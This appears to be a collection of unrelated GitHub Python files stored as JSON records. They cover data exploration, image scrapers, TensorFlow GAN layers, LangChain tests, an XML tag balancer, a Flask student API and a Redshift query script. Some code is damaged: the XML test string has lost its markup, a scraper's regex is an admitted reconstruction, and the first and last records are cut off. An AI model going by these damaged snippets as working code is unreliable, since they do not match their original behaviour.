\"dataSet1\": [1, 2, 9, 6],\n # \"dataSet2\": [7, 9, 90, 3],\n # \"dataSet3\": [78, 90, 190, 6],\n # \"dataSet4\": [78, 9, 0, 87],\n # })\n # draw\n \"\"\"每一列数据的分布图\"\"\"\n \"\"\"normed表示是否将频数转换为频率\"\"\"\n data.hist(density=False)\n print(data)\n # 
plt.tick_params(top='off', right='off')\n # plt.legend()\n plt.ylabel(\"value\")\n plt.xlabel(\"label\")\n plt.show()\n\n ''' 读取CSV文件'''\n def get_csv_data(self, dataFilePath):\n data = pd.read_csv(dataFilePath, low_memory=False)\n print(data.shape)\n return data\n\n '''将每一列所拥有的类别个数写入文件'''\n def write_column_count(self, data, column_count_file):\n with open(column_count_file, 'a') as a:\n for column in data.columns.values:\n count = data[column].nunique(dropna=False)\n a.write(column + \":\" + str(count) + '\\n')\n\n '''获取键值对'''\n def get_column_value(self, filePath):\n columns = []\n values = []\n with open(filePath, 'r') as r:\n lines = r.readlines()\n for line in lines:\n line = line.strip().split(\":\")\n temp_column = line[0]\n temp_value = int(line[1])\n # print(tempColumn + str(tempCount))\n columns.append(temp_column)\n values.append(temp_value)\n return columns, values\n\n '''将每一列空值个数写入文件'''\n def write_null_column(self, data, column_null_file):\n with open(column_null_file, 'a') as a:\n for column in data.columns.values:\n null_count = data[column].isnull().sum()\n # print(column + \":\" + str()))\n a.write(column + \":\" + str(null_count) + '\\n')\n\n '''将某一列的某一个值和所对应的个数画出图形'''\n def draw_value_count(self, data, column):\n value_count = data[column].value_counts()\n print(value_count)\n value_count.plot(kind=\"bar\", title=\"value-count\",\n figsize=(8, 8), rot=25, colormap='Paired')\n plt.ylabel(\"count\")\n plt.xlabel(\"value\")\n plt.savefig(column+\".png\")\n plt.show()\n\n\nif __name__ == '__main__':\n # preProcessing = PreProcessing()\n eda = EDA()\n basePath = \"../temp/data/\"\n\n \"\"\"获取训练和测试集\"\"\"\n trainDataFilePath = basePath + \"train_fillna.csv\"\n # testDataFilePath = basePath + \"test_fillna.csv\"\n traindata = eda.get_csv_data(trainDataFilePath)\n train_count_filepath = basePath + \"train_column_count.txt\"\n columns, values = eda.get_column_value(train_count_filepath)\n eda.bar(columns, values)\n # testdata = eda.get_csv_data(testDataFilePath)\n '''查看visitID与visitStartTime相似程度'''\n # print(len(traindata[traindata['visitStartTime']==traindata['visitId']]))\n # print(len(testdata[testdata['visitStartTime'] == testdata['visitId']]))\n '''某一列的value-count Start'''\n # print(traindata['trafficSource.campaignCode'].value_counts())\n print(traindata['device.deviceCategory'].value_counts())\n eda.draw_value_count(traindata, 'trafficSource.medium')\n '''value-count END'''\n # numer_columns = ['visitNumber', 'totals.bounces',\n # 'totals.hits', 'totals.newVisits',\n # 'totals.pageviews', 'trafficSource.adwordsClickInfo.page']\n # data = traindata.loc[:, numer_columns]\n # # print(data)\n # eda.hist(data)\n\n # for c in numer_columns:\n # print(data[c].value_counts())\n '''时间转换'''\n # visitStartTime = pd.to_datetime(traindata['visitStartTime'], unit=\"s\")\n # date = pd.to_datetime(traindata['date'].astype(str), format=\"%y%m%d\", errors='ignore')\n # print(date.loc[0:5].dt.year)\n # print(date.loc[0:5].dt.month)\n # print(date.loc[0:5].dt.day)\n # print(traindata.loc[0:5, \"visitStartTime\"])\n # print(visitStartTime.loc[0:5].astype(str))\n # # print(visitStartTime.loc[0:5].astype(str))\n # temp = date.loc[0:5]\n # traindata['totals.newVisits']\n # exclued_features = ['trafficSource.adwordsClickInfo.adNetworkType', 'trafficSource.adwordsClickInfo.isVideoAd',\n # 'trafficSource.adwordsClickInfo.page', 'trafficSource.adwordsClickInfo.slot']\n # for feature in exclued_features:\n # print(feature)\n # print(traindata[feature].unique())\n\n # 
+{"seq_id":"14887871724","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL='https://s51.mkklcdnv51.com/mangakakalot/h1/hakaijuu/vol1_chapter_1_future_is/1.jpg'\n\n#soup = BeautifulSoup(page.content, 'html.parser')\n#page_=re.findall('(.*?)/', str(soup))\n# for i in page_:\n#     print(i)\n# with requests.Session() as session:\n#     resp_2 = session.get(\"https://bu3.mkklcdnbuv1.com/mangakakalot/m2/mother_im_sorry/chapter_5_chapter_5/2.jpg\", headers={\"referer\":\"https://mangakakalot.com/chapter/ro920198/chapter_5\"})\n#     with open(\"xx.jpg\",\"wb\") as f:\n#         f.write(resp_2.content)\ndef download_image(url):\n    fullname = str(url).split('/')[-1]\n    r = requests.get(url, headers={\"referer\":\"https://manganelo.com/chapter/hakaijuu/chapter_1\"})\n    with open(fullname, 'wb') as outfile:\n        outfile.write(r.content)\n\nif __name__ == '__main__':\n    download_image('https://s51.mkklcdnv51.com/mangakakalot/h1/hakaijuu/vol1_chapter_1_future_is/5.jpg')\n    print('y')\n\n","repo_name":"elyas1877/pythonProject","sub_path":"req2.py","file_name":"req2.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"24857119391","text":"# -*- coding: UTF-8 -*-\n'''\n@Project :CNN_LSTM\n@File :train_cifar10.py\n@IDE :PyCharm \n@Author :XinYi Huang\n'''\nimport numpy as np\nfrom tensorflow.keras import activations\nfrom tensorflow.python.keras.engine.input_spec import InputSpec\nfrom tensorflow.python.keras.utils import conv_utils\nfrom tensorflow.keras.layers import (Input,\n                                     Layer,\n                                     Dense,\n                                     Conv2D,\n                                     SeparableConv2D,\n                                     Add)\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras import initializers\nimport tensorflow as tf\n\n\nclass ConvSN2D(Conv2D):\n    def __init__(self,\n                 sn_initializer=initializers.RandomNormal(0, 1),\n                 **kwargs):\n        super(ConvSN2D, self).__init__(**kwargs)\n        self.sn_initiralizer = sn_initializer\n\n    def get_config(self):\n        config = super(ConvSN2D, self).get_config()\n        config.update({\n            'sn_initializer': self.sn_initiralizer\n        })\n        return config\n\n    def build(self, input_shape):\n\n        super(ConvSN2D, self).build(input_shape)\n\n        self.sn = self.add_weight(shape=(1, self.filters),\n                                  initializer=self.sn_initiralizer,\n                                  name='sn',\n                                  trainable=False)\n        self.built = True\n\n    def call(self, input):\n        def _l2normalize(v, eps=1e-12):\n            return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n        def power_iteration(W, u):\n\n            _u = u\n            _v = _l2normalize(tf.matmul(_u, tf.transpose(W, perm=[1, 0])))\n            _u = _l2normalize(tf.matmul(_v, W))\n\n            return _u, _v\n\n        W_shape = self.kernel.shape.as_list()\n        W_reshaped = tf.reshape(self.kernel, [-1, W_shape[-1]])\n        _u, _v = power_iteration(W_reshaped, self.sn)\n        sigma = tf.matmul(_v, W_reshaped)\n        sigma = tf.matmul(sigma, tf.transpose(_u, perm=[1, 0]))\n        W_bar = W_reshaped / sigma\n        with tf.control_dependencies([self.sn.assign(_u)]):\n            W_bar = tf.reshape(W_bar, W_shape)\n\n        output = tf.nn.conv2d(input, W_bar, self.strides, self.padding.upper(),\n                              conv_utils.convert_data_format(self.data_format, ndim=4))\n        if self.use_bias:\n            output = tf.nn.bias_add(output, self.bias,\n                                    conv_utils.convert_data_format(self.data_format, ndim=4))\n\n        if self.activation is not None:\n            return self.activation(output)\n\n        return output\n\n\nclass ConvSN2DTranspose(Conv2D):\n    '''\n    If the parent class properties have been assigned real values,\n    the superclass cannot assign values to these properties\n    '''\n    def __init__(self,\n                 filters,\n                 kernel_size,\n                 strides=(1, 1),\n                 padding='valid',\n                 output_padding=None,\n                 data_format=None,\n                 dilation_rate=(1, 1),\n                 activation=None,\n                 use_bias=True,\n                 kernel_initializer=initializers.GlorotUniform(),\n                 bias_initializer=initializers.Zeros(),\n                 kernel_regularizer=None,\n                 bias_regularizer=None,\n                 activity_regularizer=None,\n                 kernel_constraint=None,\n                 bias_constraint=None,\n                 sn_initiralizer=initializers.RandomNormal(0, 1),\n                 **kwargs):\n        super(ConvSN2DTranspose, self).__init__(\n            filters=filters,\n            kernel_size=kernel_size,\n            strides=strides,\n            padding=padding,\n            data_format=data_format,\n            dilation_rate=dilation_rate,\n            activation=activations.get(activation),\n            use_bias=use_bias,\n            kernel_initializer=kernel_initializer,\n            bias_initializer=bias_initializer,\n            kernel_regularizer=kernel_regularizer,\n            bias_regularizer=bias_regularizer,\n            activity_regularizer=activity_regularizer,\n            kernel_constraint=kernel_constraint,\n            bias_constraint=bias_constraint,\n            **kwargs)\n        self.sn_initiralizer = sn_initiralizer\n\n        self.output_padding = output_padding\n        if self.output_padding is not None:\n            self.output_padding = conv_utils.normalize_tuple(\n                self.output_padding, 2, 'output_padding', allow_zero=True)\n            for stride, out_pad in zip(self.strides, self.output_padding):\n                if out_pad >= stride:\n                    raise ValueError('Strides must be greater than output padding. '\n                                     f'Received strides={self.strides}, '\n                                     f'output_padding={self.output_padding}.')\n\n    def build(self, input_shape):\n\n        assert len(input_shape) == 4\n\n        if self.data_format == 'channels_first':\n            channel_axis = 1\n        else:\n            channel_axis = -1\n\n        in_channels = input_shape[channel_axis]\n\n        if not in_channels:\n            raise ValueError('The channel dimension of the inputs '\n                             'should be defined. Found `None`.')\n\n        kernel_shape = self.kernel_size + (self.filters, in_channels)\n\n        self.kernel = self.add_weight(\n            name='kernel',\n            shape=kernel_shape,\n            initializer=self.kernel_initializer,\n            regularizer=self.kernel_regularizer,\n            constraint=self.kernel_constraint,\n            trainable=True,\n            dtype=self.dtype)\n\n        self.sn = self.add_weight(shape=(1, in_channels),\n                                  initializer=self.sn_initiralizer,\n                                  name='sn',\n                                  trainable=False)\n\n        if self.use_bias:\n            self.bias = self.add_weight(\n                name='bias',\n                shape=(self.filters,),\n                initializer=self.bias_initializer,\n                regularizer=self.bias_regularizer,\n                constraint=self.bias_constraint,\n                trainable=True,\n                dtype=self.dtype)\n        else:\n            self.bias = None\n        self.built = True\n\n    def call(self, inputs):\n\n        inputs_shape = tf.shape(inputs)\n        batch_size = inputs_shape[0]\n        if self.data_format == 'channels_first':\n            h_axis, w_axis = 2, 3\n        else:\n            h_axis, w_axis = 1, 2\n\n        dims = inputs.shape.as_list()\n        height = dims[h_axis]\n        width = dims[w_axis]\n        height = height if height is not None else inputs_shape[h_axis]\n        width = width if width is not None else inputs_shape[w_axis]\n\n        kernel_h, kernel_w = self.kernel_size\n        stride_h, stride_w = self.strides\n        dilation_rate_y, dilation_rate_x = self.dilation_rate\n        assert np.logical_and(np.greater_equal(dilation_rate_y, 1), np.greater_equal(dilation_rate_x, 1))\n\n        # compute the output shape of the transposed convolution\n        if self.padding == 'same':\n            out_height = height*stride_h\n            out_width = width*stride_w\n        elif self.padding == 'valid':\n            if np.logical_and(np.equal(dilation_rate_y, 1), np.equal(dilation_rate_x, 1)) or not self.dilation_rate:\n                out_height = height*stride_h + kernel_h - 1\n                out_width = width*stride_w + kernel_w - 1\n            elif np.logical_or(np.greater(dilation_rate_y, 1), np.greater(dilation_rate_x, 1)):\n                out_height = height*stride_h+(kernel_h-1)*dilation_rate_y\n                out_width = width*stride_w+(kernel_w-1)*dilation_rate_x\n        else:\n            raise ValueError(\"padding must be in the set {valid, same}\")\n\n        if self.data_format == 'channels_first':\n            output_shape_tensor = tf.cast([batch_size, self.filters, out_height, out_width], dtype=tf.int32)\n        else:\n            output_shape_tensor = tf.cast([batch_size, out_height, out_width, self.filters], dtype=tf.int32)\n\n        def _l2normalize(v, eps=1e-12):\n            return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n        def power_iteration(W, u):\n\n            _u = u\n            _v = _l2normalize(tf.matmul(_u, tf.transpose(W, perm=[1, 0])))\n            _u = _l2normalize(tf.matmul(_v, W))\n\n            return _u, _v\n\n        # spectral normalization\n        W_shape = self.kernel.shape.as_list()\n        W_reshaped = tf.reshape(self.kernel, [-1, W_shape[-1]])\n        _u, _v = power_iteration(W_reshaped, self.sn)\n        sigma = tf.matmul(_v, W_reshaped)\n        sigma = tf.matmul(sigma, tf.transpose(_u, perm=[1, 0]))\n        W_bar = W_reshaped / sigma\n        with tf.control_dependencies([self.sn.assign(_u)]):\n            W_bar = tf.reshape(W_bar, W_shape)\n\n        outputs = tf.nn.conv2d_transpose(\n            inputs,\n            W_bar,\n            output_shape_tensor,\n            strides=self.strides,\n            padding=self.padding.upper(),\n            data_format=conv_utils.convert_data_format(self.data_format, ndim=4),\n            dilations=self.dilation_rate)\n\n        # if not tf.executing_eagerly():\n        #     # Infer the static output shape:\n        #     out_shape = self.compute_output_shape(inputs.shape)\n        #     outputs.set_shape(out_shape)\n\n        if self.use_bias:\n            outputs = tf.nn.bias_add(\n                outputs,\n                self.bias,\n                data_format=conv_utils.convert_data_format(self.data_format, ndim=4))\n\n        if self.activation is not None:\n            return self.activation(outputs)\n        return outputs\n\n    def compute_output_shape(self, input_shape):\n\n        input_shape = tf.TensorShape(input_shape).as_list()\n        batch_size = input_shape[0]\n        if self.data_format == 'channels_first':\n            h_axis, w_axis = 2, 3\n        else:\n            h_axis, w_axis = 1, 2\n\n        height = input_shape[h_axis]\n        width = input_shape[w_axis]\n        height = height if height is not None else input_shape[h_axis]\n        width = width if width is not None else input_shape[w_axis]\n\n        kernel_h, kernel_w = self.kernel_size\n        stride_h, stride_w = self.strides\n        dilation_rate_y, dilation_rate_x = self.dilation_rate\n        assert np.logical_and(np.greater_equal(dilation_rate_y, 1), np.greater_equal(dilation_rate_x, 1))\n\n        if self.padding == 'same':\n            out_height = height * stride_h\n            out_width = width * stride_w\n        elif self.padding == 'valid':\n            if np.logical_and(np.equal(dilation_rate_y, 1), np.equal(dilation_rate_x, 1)) or not self.dilation_rate:\n                out_height = height * stride_h + kernel_h - 1\n                out_width = width * stride_w + kernel_w - 1\n            elif np.logical_or(np.greater(dilation_rate_y, 1), np.greater(dilation_rate_x, 1)):\n                out_height = height * stride_h + (kernel_h - 1) * dilation_rate_y\n                out_width = width * stride_w + (kernel_w - 1) * dilation_rate_x\n        else:\n            raise ValueError(\"padding must be in the set {valid, same}\")\n\n        if self.data_format == 'channels_first':\n            output_shape_tensor = [batch_size, self.filters, out_height, out_width]\n        else:\n            output_shape_tensor = [batch_size, out_height, out_width, self.filters]\n        return output_shape_tensor\n\n    def get_config(self):\n        config = super(ConvSN2DTranspose, self).get_config()\n        config['output_padding'] = self.output_padding\n        config['sn_initiralizer'] = self.sn_initiralizer\n\n        return config\n\n\nclass Squeeze(Layer):\n    def __init__(self,\n                 **kwargs):\n        super(Squeeze, self).__init__(**kwargs)\n\n    def call(self, input, *args, **kwargs):\n        assert len(input.shape.as_list()) == 4\n\n        return tf.squeeze(input, axis=[1, 2, 3])\n\n\nclass DenseSN(Dense):\n    def __init__(self, **kwargs):\n        super(DenseSN, self).__init__(**kwargs)\n\n    def get_config(self):\n        config = super(DenseSN, self).get_config()\n        return config\n\n    def build(self, input_shape):\n\n        super(DenseSN, self).build(input_shape)\n\n        self.sn = self.add_weight(shape=(1, self.units),\n                                  initializer=initializers.RandomNormal(0, 1),\n                                  name='sn',\n                                  trainable=False)\n\n        self.built = True\n\n    def call(self, inputs):\n        def _l2normalize(v, eps=1e-12):\n            return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n        def power_iteration(W, u):\n            _u = u\n            _v = _l2normalize(tf.matmul(_u, tf.transpose(W)))  # matrix transpose\n            _u = _l2normalize(tf.matmul(_v, W))\n            return _u, _v\n\n        W_shape = self.kernel.shape.as_list()\n        # Flatten the Tensor\n        W_reshaped = tf.reshape(self.kernel, [-1, W_shape[-1]])\n        _u, _v = power_iteration(W_reshaped, self.sn)\n        # Calculate Sigma\n        sigma = tf.matmul(_v, W_reshaped)\n        sigma = tf.matmul(sigma, tf.transpose(_u))\n        # normalize it\n        W_bar = W_reshaped / sigma\n        # reshape weight tensor\n        with tf.control_dependencies([self.sn.assign(_u)]):\n            W_bar = tf.reshape(W_bar, W_shape)\n        output = tf.matmul(inputs, W_bar)\n        if self.use_bias:\n            output = tf.nn.bias_add(output, self.bias)\n        if self.activation is not None:\n            output = self.activation(output)\n        return output\n\n\nclass NearestUpSampling2D(Layer):\n    def __init__(self,\n                 method='nearest',\n                 scale_factor=2,\n                 **kwargs):\n        super(NearestUpSampling2D, self).__init__(**kwargs)\n        assert method in ['bilinear', 'lanczos3', 'lanczos5', 'bicubic',\n                          'gaussian', 'nearest', 'area', 'mitchellcubic']\n        self.method = method\n        self.scale_factor = scale_factor\n\n    def get_config(self):\n\n        config = super(NearestUpSampling2D, self).get_config()\n        config.update({\n            'method': self.method,\n            'scale_factor': self.scale_factor,\n        })\n\n        return config\n\n    def call(self, input, *args, **kwargs):\n\n        input_shape = input.shape.as_list()\n        assert len(input_shape) == 4\n\n        h, w = input_shape[1:-1]\n\n        new_size = [h * self.scale_factor, w * self.scale_factor]\n        return tf.image.resize(images=input, size=new_size, method=self.method)\n","repo_name":"JJASMINE22/SAGAN","sub_path":"CustomLayers.py","file_name":"CustomLayers.py","file_ext":"py","file_size_in_byte":14512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"29202120208","text":"import urllib.request, urllib.error, urllib.parse, re\n\nbaseURL = \"https://www.giantitp.com/comics/\"\n# NOTE: the original pattern was stripped from this copy; a plausible reconstruction:\nlinkRgx = '<img src=\"(.*?)\">'\n\npageNum = 1\n\nwhile (pageNum <= 1201):\n\tpageURL = baseURL + \"oots%04i.html\"%pageNum\n\tprint(pageURL)\n\treq = urllib.request.Request(pageURL, headers={'User-Agent' : \"Magic Browser\"})\n\tresponse = urllib.request.urlopen(req)\n\twebContent = response.read().decode('utf-8')\n\n\tmatches = re.findall(linkRgx, webContent)\n\tfor m in matches:\n\t\tprint(m)\n\t\text = m.split(\".\")[-1]\n\t\tfileName = \"%i.%s\"%(pageNum, ext)\n\t\ttry:\n\t\t\timgURL = m.replace(\" \", \"%20\")\n\t\t\timgReq = urllib.request.Request(imgURL, headers={'User-Agent' : \"Magic Browser\"})\n\t\t\timgResponse = urllib.request.urlopen(imgReq)\n\t\t\timgContent = imgResponse.read()\n\t\t\t\n\t\t\timgFile = open(fileName, \"wb\")\n\t\t\timgFile.write(imgContent)\n\t\t\t\n\t\t\timgFile.close()\n\t\t\t\n\t\t\tprint(\"%s written\"%fileName)\n\t\texcept:\n\t\t\tprint(\"%s failed\"%fileName)\n\tpageNum += 1\n","repo_name":"fazzitron/webcomicDownloaders","sub_path":"oots.py","file_name":"oots.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39513901738","text":"import pytest\nfrom typing import List\n\nfrom pydantic import BaseModel\nfrom langchain.tools import Tool\n\nfrom ai.question_answering.schema import (\n    Question,\n    Hypothesis,\n    Thought,\n    TargettedThought,\n    DataSourceSelection,\n)\nfrom ai.question_answering.generators.base import TargettedThoughtGenerator\n\n\nclass MockAlwaysFalseComparisonFilter:\n    def __call__(self, hypothesis: Thought, other_hypothesis: List[Thought]) -> bool:\n        return True\n\n\nclass MockStaticDataSourceSelector:\n    def __call__(self, hypothesis: Hypothesis) -> Tool:\n        return DataSourceSelection(\n            data_source=Tool.from_function(\n                func=lambda hypothesis: \"a returned Hypothesis datum\",\n                name=\"test\",\n                description=\"test\",\n                # args_schema=[str],\n            ),\n            reason=\"test\",\n        )\n\n\nclass MockDiscussionGenerator:\n    def __call__(self, hypothesis: Hypothesis, data: str) -> str:\n        return \"test discussion\"\n\n\nclass MockDiscussionScorer:\n    def __call__(\n        self, hypothesis: Hypothesis, discussion: str, conclusion: str\n    ) -> float:\n        return 0.5\n\n\ndef test_static_thought_generator():\n    hypothesis = Hypothesis(hypothesis=\"hypothesis\", data_sources=[])\n\n    generator = TargettedThoughtGenerator(\n        MockAlwaysFalseComparisonFilter(),\n        MockStaticDataSourceSelector(),\n        MockDiscussionGenerator(),\n        MockDiscussionScorer(),\n    )\n\n    reply = generator.generate(hypothesis, [])\n\n    print(reply.json())\n\n\nfrom ai.question_answering.data import LLMDataSourceSelector\nfrom ai.question_answering.generators.thought.llm_discussion import (\n    LLMHypothesisDataExplainer,\n)\nfrom ai.question_answering.generators.thought.llm_scoring import LLMDataExplainerScorer\n\n\ndef test_llm_generator():\n    from langchain.chat_models import ChatOpenAI\n\n    model_name = \"gpt-4\"\n    temperature = 1.0\n    model = ChatOpenAI(model_name=model_name, temperature=temperature)\n\n    class ToolInput(BaseModel):\n        question: str\n\n    data_sources_desc = [\n        \"SQL table of sales data\",\n        \"view of sales per country\",\n        \"view of sales per product\",\n        \"view of sales cadence per customer\",\n        \"view of change in sales over time per customer\",\n    ]\n\n    dummy_data = \"Uk sales = 3%.\"\n\n    data_sources = [\n        Tool.from_function(\n            func=lambda hypothesis: dummy_data,\n            name=desc,\n            description=desc,\n            args_schema=ToolInput,\n        )\n        if desc == \"view of sales per country\"\n        else Tool.from_function(\n            func=lambda hypothesis: \"\",\n            name=desc,\n            description=desc,\n            args_schema=ToolInput,\n        )\n        for desc in data_sources_desc\n    ]\n\n    generator = TargettedThoughtGenerator(\n        MockAlwaysFalseComparisonFilter(),\n        LLMDataSourceSelector(data_sources, model),\n        LLMHypothesisDataExplainer(model),\n        LLMDataExplainerScorer(model),\n    )\n\n    hypothesis = Hypothesis(\n        hypothesis=\"The UK has the highest sales\", data_sources=data_sources\n    )\n\n    thought = generator.generate(hypothesis, [])\n    print()\n    print(thought.data, thought.discussion, thought.score)\n","repo_name":"suvalaki/automatic_insights","sub_path":"tests/question_answering/generators/test_thought.py","file_name":"test_thought.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"23728747784","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSimple ad-hoc XML fixer\n\"\"\"\n\nimport input_lexer\n\n\ndef shrink_broken_markup_interval(offset, length, all_intervals):\n    covered, broken_1st, broken_last = input_lexer.find_covered_intervals(offset, length, all_intervals)\n    end = offset + length\n\n    if broken_1st:\n        if covered[0].int_type != input_lexer.IntervalType.general:\n            # general text can be broken\n            if len(covered) < 2:\n                return None\n            else:\n                offset = covered[1].offs\n    if broken_last:\n        if covered[-1].int_type != input_lexer.IntervalType.general:\n            # general text can be broken\n            if len(covered) < 2:\n                return None\n            else:\n                end = covered[-2].end\n    rlen = end - offset\n    if rlen <= 0:\n        return None\n    return offset, rlen\n\n\ndef balance_unbalanced_text(covered_intervals):\n    \"\"\"\n    :param covered_intervals: [xmllexer.XmlInterval] -- correct unbalanced markup\n    :return: ([intervals to prepend to body], [intervals to append to body], [intervals to prepend to ref], [intervals to append to ref])\n    \"\"\"\n\n    elem_append = []\n    elem_prepend = []\n\n    ref_append = []\n    ref_prepend = []\n\n    # going right\n    stack = []\n    for i in covered_intervals:\n        if i.int_type == input_lexer.IntervalType.opentag:\n            stack.append(i)\n        elif i.int_type == input_lexer.IntervalType.closetag and len(stack):\n            stack.pop()\n\n    for i in stack:\n        elem_append.insert(0, i.create_opposite_tag())\n        ref_append.append(i)\n\n    # going left\n    stack = []\n    back_intervals = list(covered_intervals)\n    back_intervals.reverse()\n    for i in back_intervals:\n        if i.int_type == input_lexer.IntervalType.closetag:\n            stack.append(i)\n        elif i.int_type == input_lexer.IntervalType.opentag and len(stack):\n            stack.pop()\n\n    for i in stack:\n        elem_prepend.append(i.create_opposite_tag())\n        ref_prepend.insert(0, i)\n\n    return elem_prepend, elem_append, ref_prepend, ref_append\n\n# just a test\nif __name__ == '__main__':\n    src = \"\"\"t0t1t2t3t4\"\"\"\n    ints = input_lexer.lex_xml(src)\n    p, a, rp, ra = balance_unbalanced_text(ints)\n    print(\"\".join([pi.srepr for pi in p]))\n    print(src)\n    print(\"\".join([ai.srepr for ai in a]))\n    print(\"============\")\n    print(\"\".join([pi.srepr for pi in rp]) + \"\" + \"\".join([pi.srepr for pi in ra]))\n","repo_name":"spbu-se/pldoctoolkit","sub_path":"doc-clone-miner/xmlfixup.py","file_name":"xmlfixup.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"71417791936","text":"from time import sleep\nmaior = 0\nmenor = 1000\nfor c in range(1, 6):\n    peso = float(input('Enter weight #{}: '.format(c)))\n    if peso > maior:\n        maior = peso\n    if peso < menor:\n        menor = peso\nprint('The heaviest weight was {}kg and the lightest was {}kg'.format(maior, menor))\n","repo_name":"Italo-Angelo/exercicios","sub_path":"e055.py","file_name":"e055.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"17352815564","text":"s=input(\"enter string\")\nc=0\nlen1=len(s)\nfor i in range(len1-2):\n\tif s[i]=='b':\n\t\tif s[i+1]=='o':\n\t\t\tif s[i+2]=='b':\n\t\t\t\tc=c+1\n\nprint(\"No. of times are \")\nprint(c)\n","repo_name":"PoojaBiyani7/pythonpgs","sub_path":"bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"27441625593","text":"from flask import Flask, request, jsonify\nfrom flask_mysqldb import MySQL\n\n\napp = Flask(__name__)\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'flask'\napp.config['MYSQL_PASSWORD'] = 'flask'\napp.config['MYSQL_DB'] = 'flask'\n\nmysql = MySQL(app)\n\n\n@app.route('/')\ndef hello_world():\n\treturn 'Hello world!'\n\n\n@app.route('/hello', methods=['GET'])\ndef hello():\n\treturn 'hello'\n\n\n@app.route('/world', methods=['GET'])\ndef world():\n\treturn 'world'\n\n\n@app.route('/student', methods=['GET', 'POST'])\ndef student():\n\tif request.method == \"POST\":\n\t\tfirstName = request.json['First name']\n\t\tlastName = request.json.get('Last name', \"\")\n\t\tage = int(request.json.get('Age', \"18\"))\n\t\tcur = mysql.connection.cursor()\n\t\tcur.execute(\"INSERT INTO students(firstname, lastname, age) VALUES (%s, %s, %s)\", (firstName, lastName, age))\n\t\tmysql.connection.commit()\n\t\tcur.close()\n\t\tstudent = {\n\t\t\t'First name': firstName,\n\t\t\t'Last name': lastName,\n\t\t\t'Age': age\n\t\t}\n\t\treturn jsonify({'student': student})\n\telse:\n\t\tcur = mysql.connection.cursor()\n\t\tcur.execute(\"SELECT * FROM students\")\n\t\tres = cur.fetchall()\n\t\tcur.close()\n\n\t\tstudents = []\n\t\tfor row in res:\n\t\t\tstudent = {\n\t\t\t\t'ID': row[0],\n\t\t\t\t'First name': row[1],\n\t\t\t\t'Last name': row[2],\n\t\t\t\t'Age': row[3]\n\t\t\t}\n\t\t\tstudents.append(student)\n\n\t\treturn jsonify({'students': students})\n\n\n@app.route('/student/<id>', methods=['DELETE'])\ndef delete(id):\n\tcur = mysql.connection.cursor()\n\tcur.execute(\"DELETE FROM students WHERE id=%s\", (id,))\n\tmysql.connection.commit()\n\tcur.close()\n\n\treturn \"success\"\n\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"KaisongHuang/python_restful","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"3880851619","text":"import pandas as pd\nfrom sql_cnxn import redshift_cnxn\n\ndef to_int(df):\n    cols = ['tp_job_id']\n    for col in cols:\n        df[col] = df[col].apply(lambda x: int(x) if x == x else \"\")\n\nhistoric_df = pd.read_csv(r'/Volumes/Shared/Vetting and Quality/Business Validation/Negative Ratings/cleaned_negative_ratings_historic.csv'\n                          , delimiter= ',', header=0,\n                          parse_dates=['date_posted'], encoding='latin1')\n\nnew_ratings_df = pd.read_sql(r\"\"\"select tm_user_id as tp_user_id,\nho_user_id,\njob_id + 12480 as job_ref,\noverall_rating,\ncomment,\ndate_posted,\nt.date_first_active_tm as first_active_date,\n'' as vq_check\nfrom\n\t(\n\tselect tm_user_id,\n\tho_user_id,\n\tjob_id,\n\toverall_rating,\n\tcomment,\n\tdate_posted,\n\trow_number() over(partition by tm_job_id order by date_posted asc) as row_n\n\tfrom \n\t\t(\n\t\tselect tm_user_id,\n\t\tho_user_id,\n\t\tjob_id,\n\t\toverall_rating,\n\t\tcomment,\n\t\tconcat(tm_user_id,job_id) as tm_job_id,\n\t\tcreated_ts as date_posted\n\t\tfrom wh_ratings r\n\t\twhere date_posted >= case\n                                when extract(dow\n                                             from current_date) = 1 then dateadd(day,-3,current_date)\n                                else dateadd(day,-1,current_date)\n                            end\n        \tand date_posted <> current_date\n\t\tand overall_rating <= 6)\n) as t1\ninner join wh_tradesman t on t1.tm_user_id = t.user_id\nwhere row_n = 1\norder by date_posted\"\"\", redshift_cnxn, parse_dates=['date_posted'])\n\nhistoric_df['tp_job_id'] = historic_df['tp_user_id'].astype(str) + historic_df['job_ref'].astype(str)\n\nto_int(historic_df)\n\nnew_ratings_df['tp_job_id'] = new_ratings_df['tp_user_id'].astype(str) + new_ratings_df['job_ref'].astype(str)\n\nto_int(new_ratings_df)\n\nratings_de_dupe_list = historic_df['tp_job_id'].to_list()\n\nremove_flag = []\n\nfor row in new_ratings_df['tp_job_id']:\n    if row in ratings_de_dupe_list:\n        remove_flag.append(\"y\")\n    else:\n        remove_flag.append(\"n\")\n\nnew_ratings_df['remove_flag'] = remove_flag\n\nnew_ratings_df = new_ratings_df[new_ratings_df.remove_flag != 'y']\n\nnew_ratings_df = new_ratings_df.drop(['remove_flag'], axis=1)\n\nnew_ratings_df.to_csv(r'/Volumes/Shared/Vetting and 